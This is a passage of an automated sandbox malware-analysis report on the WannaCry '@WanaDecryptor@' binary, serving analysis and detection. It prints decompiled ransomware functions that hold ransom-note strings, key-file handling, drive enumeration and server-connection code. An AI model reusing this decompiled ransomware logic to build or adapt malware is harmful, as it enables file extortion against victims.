                                                      											}
                                                      											_t92 =  *(_t250 + 0xc);
                                                      											_t42 = _t250 + 8; // 0x8
                                                      											_t126 = _t42;
                                                      											__eflags = _t92;
                                                      											if(__eflags == 0) {
                                                      												_t92 = 0x41ba38;
                                                      											}
                                                      											asm("repne scasb");
                                                      											_t152 =  !(_t147 | 0xffffffff);
                                                      											_t240 = _t92 - _t152;
                                                      											_t153 = _t152 >> 2;
                                                      											memcpy(_t240 + _t153 + _t153, _t240, memcpy(_t257 + 0x40, _t240, _t153 << 2) & 0x00000003);
                                                      											_t259 = _t257 + 0x18;
                                                      											_t158 = _t259 + 0x40;
                                                      											_push(_t158);
                                                      											_t97 = E0040BA60(__eflags);
                                                      											_t260 = _t259 + 4;
                                                      											__eflags = _t97;
                                                      											if(_t97 == 0) {
                                                      												 *((intOrPtr*)(_t260 + 0x494)) = 0xffffffff;
                                                      												asm("repne scasb");
                                                      												_t160 =  !(_t158 | 0xffffffff);
                                                      												_t241 = _t260 + 0x40 - _t160;
                                                      												_t161 = _t160 >> 2;
                                                      												memcpy(0x422214, _t241, _t161 << 2);
                                                      												memcpy(_t241 + _t161 + _t161, _t241, _t160 & 0x00000003);
                                                      												_t262 = _t260 + 0x18;
                                                      												_t242 =  *((intOrPtr*)(_t262 + 0x18));
                                                      												_t101 =  *_t242;
                                                      												__eflags = _t101 - _t242;
                                                      												 *((intOrPtr*)(_t262 + 0x20)) = _t101;
                                                      												if(_t101 != _t242) {
                                                      													do {
                                                      														_push(0);
                                                      														E0040C740(_t262 + 0x1c, _t262 + 0x3c,  *((intOrPtr*)(E00402D90(_t262 + 0x28, _t262 + 0x38))));
                                                      														__eflags =  *((intOrPtr*)(_t262 + 0x20)) - _t242;
                                                      													} while ( *((intOrPtr*)(_t262 + 0x20)) != _t242);
                                                      												}
                                                      												_push( *((intOrPtr*)(_t262 + 0x18)));
                                                      												L00412C98();
                                                      												_t252 = _t262 + 4;
                                                      												_t72 = 0;
                                                      											} else {
                                                      												goto L29;
                                                      											}
                                                      											goto L32;
                                                      											L29:
                                                      											 *((intOrPtr*)( *( *0x422210) + 0xc))();
                                                      											 *((intOrPtr*)( *((intOrPtr*)(_t250 + 4)))) =  *_t250;
                                                      											_t147 = _t126;
                                                      											 *((intOrPtr*)( *_t250 + 4)) =  *((intOrPtr*)(_t250 + 4));
                                                      											E0040CE50(_t147, 0);
                                                      											_push(_t250);
                                                      											L00412C98();
                                                      											_t257 = _t260 + 4;
                                                      											 *((intOrPtr*)(_t257 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) - 1;
                                                      											Sleep(0xbb8);
                                                      											_t86 =  *(_t257 + 0x1c);
                                                      											__eflags = _t86;
                                                      										} while (_t86 > 0);
                                                      										goto L30;
                                                      									}
                                                      								} else {
                                                      									goto L17;
                                                      								}
                                                      								goto L32;
                                                      							}
                                                      							asm("sbb eax, eax");
                                                      							asm("sbb eax, 0xffffffff");
                                                      							goto L16;
                                                      						}
                                                      					} else {
                                                      						_push(0x422214);
                                                      						_t72 = E0040BA60(_t266);
                                                      						_t252 = _t252 + 4;
                                                      						if(_t72 != 0) {
                                                      							goto L3;
                                                      						}
                                                      					}
                                                      				}
                                                      				L32:
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t252 + 0x48c));
                                                      				return _t72;
                                                      			}


                                                      APIs
                                                      • strtok.MSVCRT ref: 0040BBA9
                                                      • strtok.MSVCRT ref: 0040BC22
                                                      • #825.MFC42(?,?), ref: 0040BCDD
                                                      • GetTickCount.KERNEL32 ref: 0040BCEC
                                                      • srand.MSVCRT ref: 0040BCF3
                                                      • rand.MSVCRT ref: 0040BD09
                                                      • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
                                                      • Sleep.KERNEL32(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
                                                      • #825.MFC42(?,?,?,?), ref: 0040BDED
                                                        • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
                                                      • #825.MFC42(?), ref: 0040BE7A
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825$strtok$CountSleepTickrandsrand
                                                      • String ID:
                                                      • API String ID: 1749417438-0
                                                      • Opcode ID: 22053940df912021fb9a6cdb0f17ac6f6ca949f8e593908d0331f463cdce664a
                                                      • Instruction ID: 15ce6157e9eadcb8372a8ba3d428bceb52ebc69e02ab62c17c692bc1e2f98a80
                                                      • Opcode Fuzzy Hash: 22053940df912021fb9a6cdb0f17ac6f6ca949f8e593908d0331f463cdce664a
                                                      • Instruction Fuzzy Hash: 48A102716082059BC724DF34C841AABB7D4EF95314F044A3EF99AA73D1EB78D908C79A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E004038F0(void* __ecx, void* __ebp) {
                                                      				long _v4;
                                                      				intOrPtr _v16;
                                                      				char _v1252;
                                                      				char _v1284;
                                                      				void* __edi;
                                                      				int _t20;
                                                      				int _t23;
                                                      				void* _t30;
                                                      				long _t48;
                                                      				void* _t50;
                                                      				intOrPtr _t53;
                                                      				void* _t54;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041367B);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t53;
                                                      				_t54 = _t53 - 0x4f8;
                                                      				_t50 = __ecx;
                                                      				E00403EB0( *[fs:0x0], __ecx, 0);
                                                      				_t20 = SendMessageA( *(_t50 + 0xc0), 0x147, 0, 0);
                                                      				if(_t20 != 0xffffffff) {
                                                      					_t48 = SendMessageA( *(_t50 + 0xc0), 0x150, _t20, 0);
                                                      					_t57 =  *((intOrPtr*)(_t48 + 8));
                                                      					if( *((intOrPtr*)(_t48 + 8)) == 0) {
                                                      						E00403AF0(_t48, __ebp);
                                                      					}
                                                      					E00401E90( &_v1252, _t57);
                                                      					_v4 = 0;
                                                      					sprintf( &_v1284, "%08X.dky",  *((intOrPtr*)(_t48 + 8)));
                                                      					_t54 = _t54 + 0xc;
                                                      					if(E00402020( &_v1252,  &_v1284, E00403810, 0) != 0) {
                                                      						_t30 = E00403A20( &_v1252, _t48);
                                                      						__eflags = _t30;
                                                      						if(_t30 != 0) {
                                                      							_push(0);
                                                      							_push(0x40);
                                                      							_push("All your files have been decrypted!");
                                                      							goto L8;
                                                      						}
                                                      					} else {
                                                      						if( *((intOrPtr*)(_t48 + 8)) == 0) {
                                                      							_push(0);
                                                      							_push(0x40);
                                                      							_push("Pay now, if you want to decrypt ALL your files!");
                                                      							L8:
                                                      							L00412CC8();
                                                      						}
                                                      					}
                                                      					_v4 = 0xffffffff;
                                                      					_t20 = E00401F30( &_v1252);
                                                      				}
                                                      				E00403EB0(_t20, _t50, 1);
                                                      				_t23 = CloseHandle( *(_t50 + 0xf4));
                                                      				 *(_t50 + 0xf4) = 0;
                                                      				 *[fs:0x0] = _v16;
                                                      				return _t23;
                                                      			}


                                                      APIs
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
                                                      • sprintf.MSVCRT ref: 0040397A
                                                      • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
                                                        • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
                                                        • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
                                                        • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
                                                        • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                                      • CloseHandle.KERNEL32(?,00000001), ref: 004039F1
                                                      Strings
                                                      • %08X.dky, xrefs: 00403969
                                                      • All your files have been decrypted!, xrefs: 004039C3
                                                      • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2642#3092$MessageSend$#1200CloseDiskDriveDrivesFreeHandleLogicalSpaceTypefopensprintf
                                                      • String ID: %08X.dky$All your files have been decrypted!$Pay now, if you want to decrypt ALL your files!
                                                      • API String ID: 139182656-2046724789
                                                      • Opcode ID: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                                      • Instruction ID: fac117d1ea4493994a32f15f907d1e0ff38d66192023d423f75a73c990ecb755
                                                      • Opcode Fuzzy Hash: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                                      • Instruction Fuzzy Hash: 1921E670344701ABD220EF25CC02FAB7B98AB84B15F10463EF659A72D0DBBCA5058B9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E00404090(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t16;
                                                      				intOrPtr _t34;
                                                      				intOrPtr _t39;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413739);
                                                      				_t16 =  *[fs:0x0];
                                                      				_push(_t16);
                                                      				 *[fs:0x0] = _t39;
                                                      				_push(__ecx);
                                                      				_t34 = __ecx;
                                                      				_v16 = __ecx;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx)) = 0x415d70;
                                                      				_v4 = 0;
                                                      				L00412DA6();
                                                      				_v4 = 1;
                                                      				L00412DA6();
                                                      				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x48)) = 0x415a30;
                                                      				_push(0x421798);
                                                      				_v4 = 3;
                                                      				 *((intOrPtr*)(__ecx)) = 0x415cb0;
                                                      				L00412DA0();
                                                      				_push(_t16);
                                                      				L00412D9A();
                                                      				 *((char*)(__ecx + 0x5a)) = 0;
                                                      				 *((char*)(__ecx + 0x58)) = 0;
                                                      				 *((char*)(__ecx + 0x59)) = 0;
                                                      				 *((intOrPtr*)(_t34 + 0x5c)) = LoadCursorA(0, 0x7f89);
                                                      				 *((intOrPtr*)(_t34 + 0x60)) = LoadCursorA(0, 0x7f00);
                                                      				 *((intOrPtr*)(_t34 + 0x64)) = 0xff0000;
                                                      				 *[fs:0x0] = _v20;
                                                      				return _t34;
                                                      			}









                                                      APIs
                                                      • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                                      • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                                      • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                                      • #860.MFC42(00421798), ref: 004040F6
                                                      • #858.MFC42(00000000,00421798), ref: 004040FE
                                                      • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #540CursorLoad$#567#858#860
                                                      • String ID: 0ZA
                                                      • API String ID: 2440951079-2594568282
                                                      • Opcode ID: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                                      • Instruction ID: e4089f7d30d89e223e5e607c52669a324e752666537a285565f49de8eb968109
                                                      • Opcode Fuzzy Hash: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                                      • Instruction Fuzzy Hash: 20119071244B909FC320DF1AC941B9AFBE8BBC5704F80492EE18693741C7FDA4488B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E00407CB0() {
                                                      				char _v8;
                                                      				intOrPtr _v16;
                                                      				char _v28;
                                                      				char _v40;
                                                      				void* _v104;
                                                      				void* _v168;
                                                      				char _v260;
                                                      				void* _v264;
                                                      				char* _t24;
                                                      				intOrPtr _t34;
                                                      				intOrPtr* _t35;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413F77);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t34;
                                                      				_t35 = _t34 - 0xfc;
                                                      				E004030E0( &_v260, 0);
                                                      				_v8 = 0;
                                                      				L00412B72();
                                                      				_v8 = 1;
                                                      				_t24 =  &_v28;
                                                      				_v28 = 0x415c00;
                                                      				 *_t35 = _t24;
                                                      				_v8 = 5;
                                                      				L00412D52();
                                                      				_v28 = 0x415bec;
                                                      				 *_t35 =  &_v40;
                                                      				_v40 = 0x415c00;
                                                      				_v8 = 6;
                                                      				L00412D52();
                                                      				_v40 = 0x415bec;
                                                      				_v8 = 2;
                                                      				L00412D4C();
                                                      				_v8 = 1;
                                                      				L00412D3A();
                                                      				_v8 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v16;
                                                      				return _t24;
                                                      			}














                                                      APIs
                                                        • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                                        • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                                        • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                                      • #2514.MFC42 ref: 00407CE5
                                                      • #2414.MFC42 ref: 00407D1A
                                                      • #2414.MFC42 ref: 00407D4F
                                                      • #616.MFC42 ref: 00407D6E
                                                      • #693.MFC42 ref: 00407D7F
                                                      • #641.MFC42 ref: 00407D93
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#567$#2514#324#616#641#693
                                                      • String ID: [A$[A
                                                      • API String ID: 3779294304-353784214
                                                      • Opcode ID: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                                      • Instruction ID: 921579082029cd8bb4f4eae6bba3465eb1c6e4c5ad01fea5c96a88f9cf2edf1e
                                                      • Opcode Fuzzy Hash: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                                      • Instruction Fuzzy Hash: B511A7B404D7C1CBD334DF14C255BEEBBE4BBA4714F40891EA5D947681EBB81188CA57
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E0040C240(void* __ecx, void* __eflags, void _a4048, char _a4060, intOrPtr _a9148, int _a9156, int _a9168, char* _a9200, intOrPtr _a9208, long _a9220, int _a9224, intOrPtr _a9228, intOrPtr _a9232, char _a9236, char _a9240, struct HWND__* _a9272) {
                                                      				char _v0;
                                                      				char _v4;
                                                      				char _v8;
                                                      				char _v12;
                                                      				char _v16;
                                                      				char _v20;
                                                      				char _v24;
                                                      				char _v32;
                                                      				char _v34;
                                                      				long _v36;
                                                      				char _v40;
                                                      				char _v48;
                                                      				char _v56;
                                                      				char _v64;
                                                      				char _v65;
                                                      				char _v68;
                                                      				int _v76;
                                                      				char _v77;
                                                      				void* _t57;
                                                      				signed int _t76;
                                                      				struct HWND__* _t92;
                                                      				long _t133;
                                                      				struct _IO_FILE* _t136;
                                                      				struct HWND__* _t138;
                                                      				signed int _t140;
                                                      				int _t141;
                                                      				intOrPtr _t143;
                                                      				void* _t144;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004142DB);
                                                      				 *[fs:0x0] = _t143;
                                                      				E00413060(0x240c, __ecx,  *[fs:0x0]);
                                                      				_push(_t140);
                                                      				E0040DBB0( &_v0, 0x1000);
                                                      				_a9220 = 0;
                                                      				_push( &_v4);
                                                      				_t141 = _t140 | 0xffffffff;
                                                      				_t57 = E0040BED0(_a9228, _a9232, 0xc);
                                                      				_t144 = _t143 + 0x10;
                                                      				if(_t57 == 0) {
                                                      					_t138 = _a9272;
                                                      					if(_t138 != 0) {
                                                      						SendMessageA(_t138, 0x4e20, 0, 0);
                                                      					}
                                                      					_push(8);
                                                      					_push(_a9240);
                                                      					E0040DC00( &_v0);
                                                      					_v12 = _a9236;
                                                      					_push(4);
                                                      					_push( &_v12);
                                                      					E0040DC00( &_v8);
                                                      					E0040DD00( &_v16, _a9240);
                                                      					E0040DD00( &_v20, _a9240);
                                                      					_push(1);
                                                      					_push( &_v34);
                                                      					_v34 = _a9240;
                                                      					E0040DC00( &_v24);
                                                      					_t133 = _a9220;
                                                      					_push(4);
                                                      					_push( &_v36);
                                                      					_v36 = _t133;
                                                      					E0040DC00( &_v32);
                                                      					_push(_t133);
                                                      					_push(_a9208);
                                                      					E0040DC00( &_v40);
                                                      					_push(0);
                                                      					_push(E0040DD40( &_v48));
                                                      					_push(E0040DD30( &_v48));
                                                      					_push(7);
                                                      					if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x18))() >= 0) {
                                                      						if(_t138 != 0) {
                                                      							SendMessageA(_t138, 0x4e21, 0, 0);
                                                      						}
                                                      						_push( &_v64);
                                                      						_push( &_a4060);
                                                      						_v64 = 0x13ec;
                                                      						_push( &_v65);
                                                      						if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x1c))() >= 0) {
                                                      							if(_v77 == 7) {
                                                      								_t141 = 0;
                                                      								if(_v76 > 0) {
                                                      									_t136 = fopen(_a9200, "wb");
                                                      									_t144 = _t144 + 8;
                                                      									if(_t136 != 0) {
                                                      										fwrite( &_a4048, 1, _v76, _t136);
                                                      										fclose(_t136);
                                                      										_t144 = _t144 + 0x14;
                                                      										_t141 = 1;
                                                      									}
                                                      								}
                                                      							}
                                                      							if(_t138 != 0) {
                                                      								SendMessageA(_t138, 0x4e22, _t141, 0);
                                                      							}
                                                      							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
                                                      							_a9156 = 0xffffffff;
                                                      							L23:
                                                      							E0040DBF0( &_v68);
                                                      							_t76 = _t141;
                                                      						} else {
                                                      							if(_t138 != 0) {
                                                      								SendMessageA(_t138, 0x4e22, 0xffffffff, 0);
                                                      							}
                                                      							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
                                                      							_a9156 = 0xffffffff;
                                                      							_t76 = E0040DBF0( &_v68) | 0xffffffff;
                                                      						}
                                                      						goto L24;
                                                      					} else {
                                                      						if(_t138 != 0) {
                                                      							SendMessageA(_t138, 0x4e21, 0xffffffff, 0);
                                                      						}
                                                      						 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
                                                      						_a9168 = 0xffffffff;
                                                      						_t76 = E0040DBF0( &_v56) | 0xffffffff;
                                                      						L24:
                                                      						 *[fs:0x0] = _a9148;
                                                      						return _t76;
                                                      					}
                                                      				}
                                                      				_t92 = _a9272;
                                                      				if(_t92 != 0) {
                                                      					SendMessageA(_t92, 0x4e20, _t141, 0);
                                                      				}
                                                      				_a9224 = _t141;
                                                      				goto L23;
                                                      			}































                                                      APIs
                                                        • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
                                                      • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
                                                      • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
                                                      • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
                                                      • fopen.MSVCRT ref: 0040C46B
                                                      • fwrite.MSVCRT ref: 0040C489
                                                      • fclose.MSVCRT ref: 0040C48F
                                                      • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#823fclosefopenfwrite
                                                      • String ID:
                                                      • API String ID: 1132507536-0
                                                      • Opcode ID: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                                      • Instruction ID: 95d53ca3448e84e776e95c4e63a8e9d5249152c92c36a986718404cc297984b8
                                                      • Opcode Fuzzy Hash: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                                      • Instruction Fuzzy Hash: F171F471204341EBD220DF51CC85FABB7E8FF88714F004B2EB6546B2D1CA78A909C79A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E00401140() {
                                                      				intOrPtr _v4;
                                                      				void* _t17;
                                                      				struct HWND__* _t18;
                                                      				void* _t23;
                                                      				intOrPtr _t24;
                                                      
                                                      				_t23 = _t17;
                                                      				L00412CB0();
                                                      				SendMessageA( *(_t23 + 0x80), 0x404, 1, 0);
                                                      				_t18 =  *(_t23 + 0x80);
                                                      				SendMessageA(_t18, 0x401, 0, 0x280000);
                                                      				_push(_t18);
                                                      				 *((intOrPtr*)(_t23 + 0xb0)) = 0x1e;
                                                      				_v4 = _t24;
                                                      				L00412CAA();
                                                      				E00401970("Connecting to server...");
                                                      				 *(_t23 + 0xa8) = 0;
                                                      				SetTimer( *(_t23 + 0x20), 0x3e9, 0x3e8, 0);
                                                      				if( *((intOrPtr*)(_t23 + 0xa0)) != 0) {
                                                      					 *((intOrPtr*)(_t23 + 0xac)) = CreateThread(0, 0, E004012D0, _t23, 0, 0);
                                                      				}
                                                      				return 1;
                                                      			}









                                                      APIs
                                                      • #4710.MFC42 ref: 00401145
                                                      • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
                                                      • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
                                                      • #537.MFC42(Connecting to server...), ref: 0040118D
                                                        • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                                        • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                                        • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                                      • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
                                                      • CreateThread.KERNEL32(00000000,00000000,004012D0,?,00000000,00000000), ref: 004011D1
                                                      Strings
                                                      • Connecting to server..., xrefs: 00401188
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092#4710#537#6199#800CreateThreadTimer
                                                      • String ID: Connecting to server...
                                                      • API String ID: 3305248171-1849848738
                                                      • Opcode ID: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                                      • Instruction ID: 074e0af6858d04fd3a88c2e6ba563778cf6a67133e9310fa302bc50ac74eac6c
                                                      • Opcode Fuzzy Hash: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                                      • Instruction Fuzzy Hash: 480175B0390700BBE2305B66CC46F8BB694AF84B50F10851EF349AA2D0CAF474018B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
                                                      • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
                                                      Memory Dump Source
